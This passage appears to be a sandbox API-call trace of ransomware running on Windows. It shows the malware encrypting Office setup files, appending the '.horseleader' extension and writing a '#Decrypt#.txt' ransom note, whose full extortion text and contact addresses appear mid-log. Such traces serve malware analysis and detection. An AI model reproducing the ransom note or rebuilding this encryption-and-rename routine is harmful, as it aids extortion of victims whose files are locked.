cAlternateFileName="")) returned 1 [0244.614] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0244.614] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\..") returned 100 [0244.614] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0244.614] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0244.614] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf58ed930, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc840bb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf58ed930, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x646, dwReserved0=0xe2373455, dwReserved1=0xc0f06c4f, cFileName="OneNoteMUI.XML", cAlternateFileName="ONENOT~1.XML")) returned 1 [0244.614] lstrcmpiW (lpString1="OneNoteMUI.XML", lpString2="Windows") returned -1 [0244.614] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML") returned 112 [0244.614] StrStrIW (lpFirst="OneNoteMUI.XML", lpSrch=".horseleader") returned 0x0 [0244.614] lstrcmpW (lpString1="OneNoteMUI.XML", lpString2="#Decrypt#.txt") returned 1 [0244.614] lstrcmpW (lpString1="OneNoteMUI.XML", lpString2="_uninstalling_.png") returned 1 [0244.614] lstrlenW (lpString=".testttjffg") returned 11 [0244.614] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML", lpSrch=".testttjffg") returned 0x0 [0244.614] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0244.614] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, 
dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0244.615] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\onenotemui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0244.615] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML") returned 112 [0244.615] StrStrW (lpFirst="OneNoteMUI.XML", lpSrch=".txt") returned 0x0 [0244.615] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=1606) returned 1 [0244.616] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x646, lpOverlapped=0x0) returned 1 [0244.618] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xfffff9ba, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.619] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x646, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x646, lpOverlapped=0x0) returned 1 [0244.619] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.619] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0244.619] WriteFile (in: hFile=0x15c, 
lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0244.619] CloseHandle (hObject=0x15c) returned 1 [0244.620] GetProcessHeap () returned 0x780000 [0244.620] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7de080 [0244.620] wnsprintfW (in: pszDest=0x7de080, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML.horseleader") returned 124 [0244.620] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\onenotemui.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\onenotemui.xml.horseleader")) returned 1 [0244.621] GetProcessHeap () returned 0x780000 [0244.621] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7de080 | out: hHeap=0x780000) returned 1 [0244.621] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf6e0d4a0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc8d9130, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf6e0d4a0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x7c4, dwReserved0=0xe2373455, dwReserved1=0xc0f06c4f, cFileName="SETUP.XML", cAlternateFileName="")) returned 1 [0244.621] lstrcmpiW (lpString1="SETUP.XML", lpString2="Windows") returned -1 [0244.621] 
wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML") returned 107 [0244.621] StrStrIW (lpFirst="SETUP.XML", lpSrch=".horseleader") returned 0x0 [0244.621] lstrcmpW (lpString1="SETUP.XML", lpString2="#Decrypt#.txt") returned 1 [0244.621] lstrcmpW (lpString1="SETUP.XML", lpString2="_uninstalling_.png") returned 1 [0244.621] lstrlenW (lpString=".testttjffg") returned 11 [0244.621] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML", lpSrch=".testttjffg") returned 0x0 [0244.621] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0244.621] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0244.621] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0244.622] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML") returned 107 [0244.622] StrStrW (lpFirst="SETUP.XML", lpSrch=".txt") returned 0x0 [0244.622] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=1988) returned 1 [0244.622] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, 
lpNumberOfBytesRead=0x32ae904*=0x7c4, lpOverlapped=0x0) returned 1 [0244.624] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xfffff83c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.624] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x7c4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x7c4, lpOverlapped=0x0) returned 1 [0244.625] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.625] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0244.625] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0244.625] CloseHandle (hObject=0x15c) returned 1 [0244.625] GetProcessHeap () returned 0x780000 [0244.625] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7de080 [0244.625] wnsprintfW (in: pszDest=0x7de080, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML.horseleader") returned 119 [0244.625] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\setup.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML.horseleader" (normalized: "c:\\program files\\common 
files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\setup.xml.horseleader")) returned 1 [0244.626] GetProcessHeap () returned 0x780000 [0244.626] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7de080 | out: hHeap=0x780000) returned 1 [0244.626] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf6e0d4a0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc8d9130, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf6e0d4a0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x7c4, dwReserved0=0xe2373455, dwReserved1=0xc0f06c4f, cFileName="SETUP.XML", cAlternateFileName="")) returned 0 [0244.627] FindClose (in: hFindFile=0x7c68a0 | out: hFindFile=0x7c68a0) returned 1 [0244.627] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\#Decrypt#.txt") returned 111 [0244.627] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0244.630] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0244.630] WriteFile (in: hFile=0x1a4, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32ae920*=0x5e4, lpOverlapped=0x0) returned 1 [0244.632] lstrlenA (lpString="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") returned 1368 [0244.632] WriteFile (in: hFile=0x1a4, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32ae920*=0x558, lpOverlapped=0x0) returned 1 [0244.632] CloseHandle (hObject=0x1a4) returned 1 [0244.632] GetProcessHeap () returned 0x780000 [0244.632] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e1110 | out: hHeap=0x780000) returned 1 [0244.632] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x302b0500, ftCreationTime.dwHighDateTime=0x1cba073, ftLastAccessTime.dwLowDateTime=0xcf459e40, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x302b0500, ftLastWriteTime.dwHighDateTime=0x1cba073, nFileSizeHigh=0x0, nFileSizeLow=0x709b68, dwReserved0=0x49ce1216, dwReserved1=0x4f93752c, cFileName="OSETUP.DLL", cAlternateFileName="")) returned 1 [0244.632] lstrcmpiW (lpString1="OSETUP.DLL", lpString2="Windows") returned -1 [0244.632] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OSETUP.DLL") returned 94 [0244.632] StrStrIW (lpFirst="OSETUP.DLL", lpSrch=".horseleader") returned 0x0 [0244.632] lstrcmpW (lpString1="OSETUP.DLL", lpString2="#Decrypt#.txt") returned 1 [0244.632] lstrcmpW (lpString1="OSETUP.DLL", lpString2="_uninstalling_.png") returned 1 [0244.632] lstrlenW (lpString=".testttjffg") returned 11 [0244.632] StrStrW (lpFirst="\\\\?\\C:\\Program 
Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OSETUP.DLL", lpSrch=".testttjffg") returned 0x0 [0244.632] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0244.633] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0244.633] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OSETUP.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\osetup.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0244.635] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OSETUP.DLL") returned 94 [0244.635] StrStrW (lpFirst="OSETUP.DLL", lpSrch=".txt") returned 0x0 [0244.635] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=7379816) returned 1 [0244.635] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.635] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0244.638] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.639] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0244.639] 
SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x3825b4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.639] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0244.641] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.641] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0244.642] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x704b68, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.642] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0244.648] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.648] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0244.648] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.648] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0244.648] WriteFile (in: hFile=0x1a4, 
lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0244.648] CloseHandle (hObject=0x1a4) returned 1 [0244.649] GetProcessHeap () returned 0x780000 [0244.649] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e1110 [0244.649] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OSETUP.DLL.horseleader") returned 106 [0244.649] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OSETUP.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\osetup.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OSETUP.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\osetup.dll.horseleader")) returned 1 [0244.650] GetProcessHeap () returned 0x780000 [0244.650] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e1110 | out: hHeap=0x780000) returned 1 [0244.650] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5de00200, ftCreationTime.dwHighDateTime=0x1cac9ac, ftLastAccessTime.dwLowDateTime=0x598fccf0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5de00200, ftLastWriteTime.dwHighDateTime=0x1cac9ac, nFileSizeHigh=0x0, nFileSizeLow=0xb9a0, dwReserved0=0x49ce1216, dwReserved1=0x4f93752c, cFileName="OSetupPS.dll", cAlternateFileName="")) returned 1 [0244.651] lstrcmpiW (lpString1="OSetupPS.dll", lpString2="Windows") returned -1 [0244.651] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OSetupPS.dll") returned 96 [0244.651] StrStrIW (lpFirst="OSetupPS.dll", lpSrch=".horseleader") returned 0x0 [0244.651] lstrcmpW (lpString1="OSetupPS.dll", lpString2="#Decrypt#.txt") returned 1 [0244.651] lstrcmpW (lpString1="OSetupPS.dll", lpString2="_uninstalling_.png") returned 1 [0244.651] lstrlenW (lpString=".testttjffg") returned 11 [0244.651] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OSetupPS.dll", lpSrch=".testttjffg") returned 0x0 [0244.651] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0244.651] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0244.651] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OSetupPS.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\osetupps.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0244.652] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OSetupPS.dll") returned 96 [0244.652] StrStrW (lpFirst="OSetupPS.dll", lpSrch=".txt") returned 0x0 [0244.652] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=47520) returned 1 [0244.652] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0244.655] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, 
lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.656] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0244.657] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0244.657] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.657] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0244.658] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x19a0, lpOverlapped=0x0) returned 1 [0244.658] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffe660, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.658] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x19a0, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x19a0, lpOverlapped=0x0) returned 1 [0244.658] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.658] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 
